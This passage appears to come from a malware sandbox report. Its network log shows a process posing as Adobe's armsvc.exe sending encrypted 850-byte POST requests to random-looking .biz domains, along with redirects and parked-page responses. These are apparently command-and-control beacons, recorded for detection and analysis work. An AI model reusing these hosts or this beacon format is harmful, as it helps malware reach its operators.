                                                                                                                                                                                                                                                                        Data Ascii: c'#F}4#*dNEW%yUJ&,&LxH#6vV8w+`:kT#gETHq6n'ZqwAK}.[eKZCi<\)u9@o}On4:>qXboCld)!.De'(!B'
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.788702011 CET276INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.999663115 CET276INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.694822073 CET347OUTPOST /lderrm HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.694993019 CET850OUTData Raw: 75 3f f4 ca d6 b8 ed ef 46 03 00 00 a9 9f b3 65 76 8a 37 63 6b 35 0a 61 f9 16 64 f7 d5 cd 2e ad d0 81 bf 72 e9 de 7e c7 fa f6 c8 25 6d 08 5f 83 ac 2d b9 08 de 62 ed 6d b4 37 0f ac 83 c5 2a 85 84 41 39 7c 16 c2 46 39 6d 1b 9c b9 41 bb 0e 2c e4 97
                                                                                                                                                                                                                                                                        Data Ascii: u?Fev7ck5ad.r~%m_-bm7*A9|F9mA,[)?AFZu7<:-IKt);\%fl!cd4o/7Z+v>`LRP.z4$9d3PH2gpK*)2VXg>f
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.909724951 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.119919062 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        36192.168.2.224920076.223.26.96803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.951627016 CET352OUTGET /qdy?usid=20&utid=14164936400 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww12.fwiwk.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579607964 CET823INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:51 GMT
                                                                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OT1tcFuM0xqIMG1SOnpM8MwMO3Au6ekkHiLbjGZt5bfKbfAUELkpZEsT/z6dPga0MCXvzjtNxqK4v6V5Wjw7tg==
                                                                                                                                                                                                                                                                        X-Domain: fwiwk.biz
                                                                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579704046 CET1236INData Raw: 33 64 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                                                                        Data Ascii: 3d1f<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OT1tcFuM0xqIMG1SOnpM8MwMO3Au6ekkHiLbjGZt5bfKbfAUELkpZEsT/z6dPga0MCXvz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579735041 CET224INData Raw: 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f 6c 64
                                                                                                                                                                                                                                                                        Data Ascii: n:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579787016 CET1236INData Raw: 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:1r
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579822063 CET1236INData Raw: 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d 61 72
                                                                                                                                                                                                                                                                        Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579849958 CET164INData Raw: 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73 50 53
                                                                                                                                                                                                                                                                        Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9z
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579881907 CET1236INData Raw: 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 61 44
                                                                                                                                                                                                                                                                        Data Ascii: dmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="a
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579915047 CET1236INData Raw: 3c 62 72 2f 3e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53
                                                                                                                                                                                                                                                                        Data Ascii: <br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent',
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579945087 CET448INData Raw: 51 35 4e 44 67 32 4f 44 6b 32 59 54 4a 6c 4e 44 4d 31 4e 6a 55 31 4f 57 4d 32 4f 57 51 79 4e 6a 59 33 4d 7a 55 33 4f 54 42 6c 4e 6d 45 77 5a 54 45 36 4e 6a 63 34 4e 32 45 79 5a 6d 49 32 4f 57 45 31 4e 77 3d 3d 27 3b 20 20 20 20 20 20 20 20 20 6c
                                                                                                                                                                                                                                                                        Data Ascii: Q5NDg2ODk2YTJlNDM1NjU1OWM2OWQyNjY3MzU3OTBlNmEwZTE6Njc4N2EyZmI2OWE1Nw=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OWUxfHx8MTczNjk0MjMzMS40NzIzfDVlMDY2YTUwNGE1ZTA4Njcy
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.580003977 CET1236INData Raw: 54 4a 69 4d 6a 4e 6d 59 6a 41 77 4e 7a 67 34 4e 6a 45 7a 5a 54 68 69 5a 57 45 7a 59 7a 6b 33 4e 54 6b 77 59 54 6c 6d 59 57 59 34 4d 6d 49 79 59 6d 56 38 4d 48 78 6b 63 43 31 30 5a 57 46 74 61 57 35 30 5a 58 4a 75 5a 58 51 78 4d 6c 38 7a 63 47 68
                                                                                                                                                                                                                                                                        Data Ascii: TJiMjNmYjAwNzg4NjEzZThiZWEzYzk3NTkwYTlmYWY4MmIyYmV8MHxkcC10ZWFtaW50ZXJuZXQxMl8zcGh8MHwwfDE3NzkyNzU0NTh8fHw='; let domain='fwiwk.biz'; let scriptPath=''; let adtest='off';if(top.location!==location) { top.location.href=l
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584866047 CET1236INData Raw: 6e 74 61 69 6e 65 72 4e 61 6d 65 73 29 29 20 7b 61 6a 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 22 2b 20 22 3f 74 6f 67 67 6c 65 3d 61 64 6c 6f 61 64 65 64 22 2b 20 22 26 75 69 64 3d 22 20 2b
                                                                                                                                                                                                                                                                        Data Ascii: ntainerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': fun


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        37192.168.2.2249202199.59.243.228803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.609900951 CET354OUTGET /lderrm?usid=20&utid=14164936613 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww7.fwiwk.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.064865112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        date: Wed, 15 Jan 2025 11:58:52 GMT
                                                                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        content-length: 1130
                                                                                                                                                                                                                                                                        x-request-id: a7a61546-2fe9-4ba1-9bbf-a3c97b79c402
                                                                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RTSdIaedCnPa6CqMZgtKNGqZ3MhSmzzGa7WA2r8os+Mfa+J3aFLBIEVTLfxdmO59A4483mGeKZ6MJ41BIfzJvQ==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=a7a61546-2fe9-4ba1-9bbf-a3c97b79c402; expires=Wed, 15 Jan 2025 12:13:53 GMT; path=/
                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 54 53 64 49 61 65 64 43 6e 50 61 36 43 71 4d 5a 67 74 4b 4e 47 71 5a 33 4d 68 53 6d 7a 7a 47 61 37 57 41 32 72 38 6f 73 2b 4d 66 61 2b 4a 33 61 46 4c 42 49 45 56 54 4c 66 78 64 6d 4f 35 39 41 34 34 38 33 6d 47 65 4b 5a 36 4d 4a 34 31 42 49 66 7a 4a 76 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RTSdIaedCnPa6CqMZgtKNGqZ3MhSmzzGa7WA2r8os+Mfa+J3aFLBIEVTLfxdmO59A4483mGeKZ6MJ41BIfzJvQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.064928055 CET564INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdhNjE1NDYtMmZlOS00YmExLTliYmYtYTNjOTdiNzljNDAyIiwicGFnZV90aW1lIjoxNzM2OTQyMzMzLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        38192.168.2.224920434.246.200.160803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.229257107 CET345OUTPOST /wua HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.229289055 CET850OUTData Raw: c2 02 00 bc 95 4f ff 48 46 03 00 00 0e 0d ea 3c 38 07 7c 1a 30 80 a9 12 72 0b b2 e5 ff ef 3f b1 71 76 cc df e9 93 e0 83 99 6d fa f6 f0 55 87 d2 ca 30 9c 4b 23 ee c1 ec 28 fb 5c 6f bc 18 99 08 c6 7c 5f 6f 7c 82 04 fc eb 77 54 d7 0d 79 1c d4 57 22
                                                                                                                                                                                                                                                                        Data Ascii: OHF<8|0r?qvmU0K#(\o|_o|wTyW"=~jo@+s=WVj0j@D7MGkVhT7^4Uk`,N3p!<,ZC5}=YpMVq`;-B2Si-L#'.2wyf
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.952501059 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=57dccea13f33a544e85cbd4f70150be7|8.46.123.189|1736942333|1736942333|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        39192.168.2.224920634.227.7.138803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.072668076 CET356OUTPOST /ivjxabsxpnamgnu HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.072669029 CET850OUTData Raw: 4e 66 a5 84 7e 7c ac d0 46 03 00 00 32 fb 38 3a a2 f0 f4 64 ae ef 96 30 e5 85 cf 60 cd fd f8 bb 7c c6 08 70 a7 37 bd d8 8d ff c0 54 4c d3 2e 36 f4 24 1d e5 d4 1f 2c c9 a3 fa e5 31 f8 7b 84 84 15 79 ae c7 db fa 17 8e 24 19 a8 65 56 09 5d 08 20 31
                                                                                                                                                                                                                                                                        Data Ascii: Nf~|F28:d0`|p7TL.6$,1{y$eV] 1Nh/f-oF7|.w&GZ7^?eUuB IS9DuP5cx5[,4]5/oBJ]yS5#l{]}P8u+2y`Y
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.499115944 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=353cef26a7a13170870ba023ff759699|8.46.123.189|1736942334|1736942334|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        40192.168.2.2249207208.117.43.225803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.538629055 CET357OUTPOST /dwwujsrodteum HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.538629055 CET850OUTData Raw: ac 64 d3 2e db 8b 85 e9 46 03 00 00 c8 08 50 0a 3f 9c 85 25 a0 71 6c e1 fe fa 8f f9 5f c9 ea 7a 81 9b 64 97 5c a7 2c 00 5c 5d 77 28 dd ad 31 04 39 12 59 09 7b 67 e8 bb ef 78 4e 9e 8b cd 8c a2 ce 7e 1b 7f 58 ca e2 ef f7 c8 65 5d 45 b4 80 e1 8e 93
                                                                                                                                                                                                                                                                        Data Ascii: d.FP?%ql_zd\,\]w(19Y{gxN~Xe]EVV't;.HXTK!`ZgS<[tKKN~%Ig'`8[w%97AE0 ,Eklh+UZ]|hy0c8\IvsOyon<
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.022780895 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
